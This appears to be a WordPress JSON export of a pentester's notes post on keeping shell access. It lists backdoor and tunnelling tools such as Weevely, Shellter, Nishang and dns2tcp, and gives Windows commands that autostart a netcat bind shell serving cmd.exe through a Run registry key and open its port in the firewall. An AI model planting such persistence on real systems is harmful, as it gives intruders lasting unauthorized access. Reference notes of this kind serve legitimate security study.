{"id":496,"date":"2019-09-23T10:43:01","date_gmt":"2019-09-23T08:43:01","guid":{"rendered":"https:\/\/privat.andreas-klingler.de\/itsec\/?p=496"},"modified":"2023-12-24T13:04:40","modified_gmt":"2023-12-24T12:04:40","slug":"weevely","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=496","title":{"rendered":"Maintain shell access"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\">Weevely<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/tools.kali.org\/maintaining-access\/weevely\">https:\/\/tools.kali.org\/maintaining-access\/weevely<\/a><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Erzeugt PHP-Skript auf Serv\u00ader, mit dem man eine Shell wieder bekom\u00admen&nbsp;kann.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Various scripts<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>In Kali:\/usr\/share\/webshells<\/li>\n\n\n\n<li><a href=\"https:\/\/github.com\/backdoorhub\/shell-backdoor-list\">https:\/\/github.com\/backdoorhub\/shell-backdoor-list<\/a><\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Shelter (win32)<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Dynam\u00adic shell injec\u00adtion tool into nor\u00admal Win\u00addows binaries.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/tools.kali.org\/maintaining-access\/shellter\">https:\/\/tools.kali.org\/maintaining-access\/shellter<\/a><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Create own (normal) shell<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Cre\u00adate a open shell via netcat.<\/li>\n\n\n\n<li>Cre\u00adate a open shell via dbd (https:\/\/tools.kali.org\/maintaining-access\/shellter)<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">HTTPTunnel<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Needs <span class=\"caps\">PHP<\/span>; cre\u00adates file on a serv\u00ader which acts as <span class=\"caps\">SSH<\/span>&nbsp;proxy.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Nishang<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Col\u00adlec\u00adtion of Pow\u00ader\u00adShell scripts for back\u00addoors and&nbsp;more.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Kali:\/usr\/share\/nishang<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">dns2tcp<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Cre\u00adates a <span class=\"caps\">TCP<\/span> tun\u00adnel via a <span class=\"caps\">DNS<\/span> server.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">psexec<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Use psex\u00adec from Impack\u00adet to cre\u00adate a reg\u00adu\u00adlar\u00adly run\u00adning script.<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">Windows<\/h1>\n\n\n\n<h3 class=\"wp-block-heading\">Autostart nc<\/h3>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Upload nc to the serv\u00ader (e.g. from \/usr\/share\/windows-binaries\/nc.exe)<br>Set the autorun reg\u00adistry entry:<br><span class=\"caps\">REG<\/span> <span class=\"caps\">ADD<\/span> <span class=\"caps\">HKLM<\/span>\\software\\microsoft\\windows\\currentversion\\run \/v \u201cnc\u201d \/t <span class=\"caps\">REG_SZ<\/span> \/d \u201cC:\\Users\\w7vm\\Desktop\\nc.exe \u2011Ldp 4488 \u2011e cmd.exe\u201d<\/li>\n\n\n\n<li>&nbsp;Add a new fire\u00adwall rule<br>netsh fire\u00adwall add por\u00adtopen\u00ading <span class=\"caps\">TCP<\/span> 4488 \u201cSer\u00advice Fire\u00adwall\u201d <span class=\"caps\">ENABLE<\/span> <span class=\"caps\">ALL<\/span><\/li>\n\n\n\n<li>Dou\u00adble check that the rule is active now<br>netsh fire\u00adwall show portopening<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">Warn\u00ading: Could be that Win\u00addows shows a con\u00adfir\u00adma\u00adtion pop\u00adup on start\u00ading before start\u00ading nectar.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Wee\u00adve\u00adly https:\/\/tools.kali.org\/maintaining-access\/weevely Erzeugt PHP-Skript auf Serv\u00ader, mit dem man eine Shell wieder bekom\u00admen&nbsp;kann. Var\u00adi\u00adous scripts Shel\u00adter (win32) Dynam\u00adic shell injec\u00adtion tool into nor\u00admal Win\u00addows bina\u00adries. https:\/\/tools.kali.org\/maintaining-access\/shellter Cre\u00adate own (nor\u00admal) shell HTTP\u00adTun\u00adnel Needs <span class=\"caps\">PHP<\/span>; cre\u00adates file on a serv\u00ader which acts as <span class=\"caps\">SSH<\/span>&nbsp;proxy. Nis\u00adhang Col\u00adlec\u00adtion of Pow\u00ader\u00adShell scripts for back\u00addoors and&nbsp;more. Kali:\/usr\/share\/nishang dns2tcp Cre\u00adates a&nbsp;<span class=\"caps\">TCP<\/span>&nbsp;[\u2026]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[473],"tags":[102,143,59,142],"class_list":["post-496","post","type-post","status-publish","format-standard","hentry","category-persistence","tag-exploitation","tag-php","tag-shell","tag-weevely"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/496","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=496"}],"version-history":[{"count":9,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/496\/revisions"}],"predecessor-version":[{"id":3814,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/496\/revisions\/3814"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=496"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=496"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=496"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}